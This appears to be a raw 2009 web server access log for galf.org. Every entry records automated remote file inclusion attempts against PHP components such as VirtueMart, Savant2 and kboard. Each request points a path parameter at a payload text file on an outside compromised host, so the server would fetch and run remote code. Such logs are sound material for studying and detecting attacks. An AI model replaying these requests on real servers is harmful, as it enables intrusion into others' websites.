77.222.40.247 - - [20/Sep/2009:21:42:48 -0700] "GET /?site=%20bussnisshttp://www.buckscountychurch.org/bcpcchoi/classes/template/test.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "galf.org"
77.222.40.247 - - [20/Sep/2009:21:42:49 -0700] "GET /logs/?site=%20bussnisshttp://www.buckscountychurch.org/bcpcchoi/classes/template/test.txt?? HTTP/1.1" 200 4942 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "galf.org"
222.236.221.64 - - [20/Sep/2009:21:43:45 -0700] "GET /logs/access_090601.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://ccs.kaist.ac.kr/~ee301/EC2_07//bbs//id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.221.64 - - [20/Sep/2009:21:43:46 -0700] "GET /logs/access_090601.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://ccs.kaist.ac.kr/~ee301/EC2_07//bbs//id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
206.225.23.4 - - [20/Sep/2009:21:44:15 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
206.225.23.4 - - [20/Sep/2009:21:44:15 -0700] "GET /logs/access.log%20%20/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
206.225.23.4 - - [20/Sep/2009:21:44:15 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
206.225.23.4 - - [20/Sep/2009:21:44:18 -0700] "GET /logs/access.log%20%20/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
206.225.23.4 - - [20/Sep/2009:21:44:18 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
206.225.23.4 - - [20/Sep/2009:21:44:18 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
222.236.221.64 - - [20/Sep/2009:21:44:27 -0700] "GET /logs/access_090525.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://ccs.kaist.ac.kr/~ee301/EC2_07//bbs//id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.221.64 - - [20/Sep/2009:21:44:35 -0700] "GET /logs/access_090525.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://ccs.kaist.ac.kr/~ee301/EC2_07//bbs//id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [20/Sep/2009:21:54:13 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
122.155.5.84 - - [20/Sep/2009:21:54:13 -0700] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
122.155.5.84 - - [20/Sep/2009:21:54:13 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
122.155.5.84 - - [20/Sep/2009:21:54:28 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
122.155.5.84 - - [20/Sep/2009:21:54:28 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
122.155.5.84 - - [20/Sep/2009:21:54:28 -0700] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
77.222.40.247 - - [20/Sep/2009:21:54:29 -0700] "GET /?pagina=%20bussnisshttp://www.buckscountychurch.org/bcpcchoi/classes/template/test.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
77.222.40.247 - - [20/Sep/2009:21:54:29 -0700] "GET /logs/?pagina=%20bussnisshttp://www.buckscountychurch.org/bcpcchoi/classes/template/test.txt?? HTTP/1.1" 200 4942 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
222.236.47.182 - - [20/Sep/2009:21:58:27 -0700] "GET /Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.ctseng.co.kr/bbs//icon/private_icon/private/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
222.236.47.182 - - [20/Sep/2009:21:58:27 -0700] "GET /logs/access.log//Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.ctseng.co.kr/bbs//icon/private_icon/private/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
222.236.47.182 - - [20/Sep/2009:21:58:27 -0700] "GET /logs//Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.ctseng.co.kr/bbs//icon/private_icon/private/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
222.236.47.182 - - [20/Sep/2009:21:58:50 -0700] "GET /logs/access_090518.log//Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.ctseng.co.kr/bbs//icon/private_icon/private/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.47.182 - - [20/Sep/2009:21:58:50 -0700] "GET /Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.ctseng.co.kr/bbs//icon/private_icon/private/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.47.182 - - [20/Sep/2009:21:58:50 -0700] "GET /logs//Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.ctseng.co.kr/bbs//icon/private_icon/private/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.125.74.87 - - [20/Sep/2009:21:59:55 -0700] "GET /logs/access_090525.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sports.wisegiga.net/bbs/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.125.74.87 - - [20/Sep/2009:21:59:55 -0700] "GET /logs/access_090511.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sports.wisegiga.net/bbs/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.125.74.87 - - [20/Sep/2009:21:59:55 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sports.wisegiga.net/bbs/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.125.74.87 - - [20/Sep/2009:21:59:55 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sports.wisegiga.net/bbs/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.47.182 - - [20/Sep/2009:21:59:56 -0700] "GET /logs//uks_vote_v3021/setup.php?dir=http://www.ctseng.co.kr/bbs//icon/private_icon/private/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.47.182 - - [20/Sep/2009:21:59:56 -0700] "GET /logs/access.log//uks_vote_v3021/setup.php?dir=http://www.ctseng.co.kr/bbs//icon/private_icon/private/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.47.182 - - [20/Sep/2009:21:59:56 -0700] "GET /uks_vote_v3021/setup.php?dir=http://www.ctseng.co.kr/bbs//icon/private_icon/private/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.47.182 - - [20/Sep/2009:22:00:09 -0700] "GET /logs/access.log//uks_vote_v3021/setup.php?dir=http://www.ctseng.co.kr/bbs//icon/private_icon/private/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.47.182 - - [20/Sep/2009:22:00:09 -0700] "GET /logs//uks_vote_v3021/setup.php?dir=http://www.ctseng.co.kr/bbs//icon/private_icon/private/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.47.182 - - [20/Sep/2009:22:00:09 -0700] "GET /uks_vote_v3021/setup.php?dir=http://www.ctseng.co.kr/bbs//icon/private_icon/private/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.47.182 - - [20/Sep/2009:22:00:15 -0700] "GET /Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.ctseng.co.kr/bbs//icon/private_icon/private/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
222.236.47.182 - - [20/Sep/2009:22:00:15 -0700] "GET /logs/access.log//Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.ctseng.co.kr/bbs//icon/private_icon/private/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
222.236.47.182 - - [20/Sep/2009:22:00:15 -0700] "GET /logs//Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.ctseng.co.kr/bbs//icon/private_icon/private/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
222.236.47.182 - - [20/Sep/2009:22:00:46 -0700] "GET /logs/access_090518.log//Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.ctseng.co.kr/bbs//icon/private_icon/private/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.47.182 - - [20/Sep/2009:22:00:46 -0700] "GET /Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.ctseng.co.kr/bbs//icon/private_icon/private/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.47.182 - - [20/Sep/2009:22:00:46 -0700] "GET /logs//Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.ctseng.co.kr/bbs//icon/private_icon/private/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
213.165.83.144 - - [20/Sep/2009:22:01:20 -0700] "GET /logs/access.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://pyungan.or.kr/bbs/.injek/kontol.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
213.165.83.144 - - [20/Sep/2009:22:01:20 -0700] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://pyungan.or.kr/bbs/.injek/kontol.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
213.165.83.144 - - [20/Sep/2009:22:01:20 -0700] "GET /index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://pyungan.or.kr/bbs/.injek/kontol.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
222.236.47.182 - - [20/Sep/2009:22:03:25 -0700] "GET /logs/access.log%20%20//Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.ctseng.co.kr/bbs//icon/private_icon/private/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.224.55.130 - - [20/Sep/2009:22:03:43 -0700] "GET /logs/access.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://pyungan.or.kr/bbs/.injek/kontol.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
211.224.55.130 - - [20/Sep/2009:22:03:46 -0700] "GET /index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://pyungan.or.kr/bbs/.injek/kontol.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
211.224.55.130 - - [20/Sep/2009:22:03:53 -0700] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://pyungan.or.kr/bbs/.injek/kontol.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
222.236.47.182 - - [20/Sep/2009:22:05:06 -0700] "GET /logs/access_090427.log%20%20//Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.ctseng.co.kr/bbs//icon/private_icon/private/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.47.182 - - [20/Sep/2009:22:05:22 -0700] "GET /logs/access.log%20%20//Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.ctseng.co.kr/bbs//icon/private_icon/private/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.125.74.87 - - [20/Sep/2009:22:16:12 -0700] "GET /logs/access_090622.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sports.wisegiga.net/bbs/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.125.74.87 - - [20/Sep/2009:22:16:12 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sports.wisegiga.net/bbs/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.125.74.87 - - [20/Sep/2009:22:16:12 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sports.wisegiga.net/bbs/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.221.64 - - [20/Sep/2009:22:16:18 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://ccs.kaist.ac.kr/~ee301/EC2_07//bbs//id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.221.64 - - [20/Sep/2009:22:16:18 -0700] "GET /logs/access_090622.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://ccs.kaist.ac.kr/~ee301/EC2_07//bbs//id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.221.64 - - [20/Sep/2009:22:16:18 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://ccs.kaist.ac.kr/~ee301/EC2_07//bbs//id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.221.64 - - [20/Sep/2009:22:16:23 -0700] "GET /logs/access_090615.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://ccs.kaist.ac.kr/~ee301/EC2_07//bbs//id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.221.64 - - [20/Sep/2009:22:16:26 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://ccs.kaist.ac.kr/~ee301/EC2_07//bbs//id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.221.64 - - [20/Sep/2009:22:16:26 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://ccs.kaist.ac.kr/~ee301/EC2_07//bbs//id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.221.64 - - [20/Sep/2009:22:16:34 -0700] "GET /logs/access_090622.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://ccs.kaist.ac.kr/~ee301/EC2_07//bbs//id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.221.64 - - [20/Sep/2009:22:16:39 -0700] "GET /logs/access_090615.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://ccs.kaist.ac.kr/~ee301/EC2_07//bbs//id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.125.74.87 - - [20/Sep/2009:22:17:24 -0700] "GET /logs/access_090608.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sports.wisegiga.net/bbs/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.125.74.87 - - [20/Sep/2009:22:19:15 -0700] "GET /logs/access_090622.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sports.wisegiga.net/bbs/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.221.64 - - [20/Sep/2009:22:20:02 -0700] "GET /logs/access_090622.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://ccs.kaist.ac.kr/~ee301/EC2_07//bbs//id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.125.74.87 - - [20/Sep/2009:22:20:12 -0700] "GET /logs/access_090608.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sports.wisegiga.net/bbs/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.221.64 - - [20/Sep/2009:22:20:20 -0700] "GET /logs/access_090622.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://ccs.kaist.ac.kr/~ee301/EC2_07//bbs//id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.221.64 - - [20/Sep/2009:22:20:35 -0700] "GET /logs/access_090608.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://ccs.kaist.ac.kr/~ee301/EC2_07//bbs//id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.221.64 - - [20/Sep/2009:22:20:51 -0700] "GET /logs/access_090608.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://ccs.kaist.ac.kr/~ee301/EC2_07//bbs//id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [20/Sep/2009:22:25:47 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [20/Sep/2009:22:25:47 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [20/Sep/2009:22:25:47 -0700] "GET /logs/access_090525.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [20/Sep/2009:22:26:15 -0700] "GET /logs/access_090615.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [20/Sep/2009:22:27:17 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [20/Sep/2009:22:27:17 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [20/Sep/2009:22:27:17 -0700] "GET /logs/access_090525.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [20/Sep/2009:22:27:37 -0700] "GET /logs/access_090615.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.221.64 - - [20/Sep/2009:22:34:50 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://ccs.kaist.ac.kr/~ee301/EC2_07//bbs//id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.221.64 - - [20/Sep/2009:22:34:50 -0700] "GET /logs/access_090420.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://ccs.kaist.ac.kr/~ee301/EC2_07//bbs//id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.221.64 - - [20/Sep/2009:22:34:50 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://ccs.kaist.ac.kr/~ee301/EC2_07//bbs//id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.221.64 - - [20/Sep/2009:22:34:50 -0700] "GET /logs/access_090504.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://ccs.kaist.ac.kr/~ee301/EC2_07//bbs//id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.125.74.87 - - [20/Sep/2009:22:35:16 -0700] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://randycute.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.125.74.87 - - [20/Sep/2009:22:35:16 -0700] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://randycute.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.125.74.87 - - [20/Sep/2009:22:35:16 -0700] "GET /logs/access_090316.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://randycute.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.125.74.87 - - [20/Sep/2009:22:35:20 -0700] "GET /logs/access_090316.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://randycute.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.125.74.87 - - [20/Sep/2009:22:35:20 -0700] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://randycute.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.125.74.87 - - [20/Sep/2009:22:35:20 -0700] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://randycute.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.125.74.87 - - [20/Sep/2009:22:35:22 -0700] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://randycute.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.125.74.87 - - [20/Sep/2009:22:35:22 -0700] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://randycute.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.125.74.87 - - [20/Sep/2009:22:35:22 -0700] "GET /logs/access_090316.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://randycute.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.125.74.87 - - [20/Sep/2009:22:35:22 -0700] "GET /logs/access_090316.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://randycute.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.125.74.87 - - [20/Sep/2009:22:35:22 -0700] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://randycute.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.125.74.87 - - [20/Sep/2009:22:35:23 -0700] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://randycute.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.125.74.87 - - [20/Sep/2009:22:35:32 -0700] "GET /logs/access_090817.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://randycute.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.221.64 - - [20/Sep/2009:22:35:34 -0700] "GET /logs/access_090420.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://ccs.kaist.ac.kr/~ee301/EC2_07//bbs//id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.221.64 - - [20/Sep/2009:22:35:34 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://ccs.kaist.ac.kr/~ee301/EC2_07//bbs//id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.221.64 - - [20/Sep/2009:22:35:34 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://ccs.kaist.ac.kr/~ee301/EC2_07//bbs//id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.221.64 - - [20/Sep/2009:22:35:34 -0700] "GET /logs/access_090504.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://ccs.kaist.ac.kr/~ee301/EC2_07//bbs//id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.125.74.87 - - [20/Sep/2009:22:35:36 -0700] "GET /logs/access_090817.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://randycute.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.125.74.87 - - [20/Sep/2009:22:35:37 -0700] "GET /logs/access_090817.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://randycute.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.125.74.87 - - [20/Sep/2009:22:35:38 -0700] "GET /logs/access_090817.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://randycute.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.221.64 - - [20/Sep/2009:22:40:06 -0700] "GET /logs/access_090504.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://ccs.kaist.ac.kr/~ee301/EC2_07//bbs//id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.221.64 - - [20/Sep/2009:22:40:21 -0700] "GET /logs/access_090504.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://ccs.kaist.ac.kr/~ee301/EC2_07//bbs//id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.221.64 - - [20/Sep/2009:22:42:03 -0700] "GET /logs/access_090420.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://ccs.kaist.ac.kr/~ee301/EC2_07//bbs//id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.221.64 - - [20/Sep/2009:22:42:38 -0700] "GET /logs/access_090420.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://ccs.kaist.ac.kr/~ee301/EC2_07//bbs//id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [20/Sep/2009:22:50:30 -0700] "GET /logs///include/footer.php?_path[counter]=http://www.4pppp.com//icon1.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [20/Sep/2009:22:50:30 -0700] "GET //include/footer.php?_path[counter]=http://www.4pppp.com//icon1.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
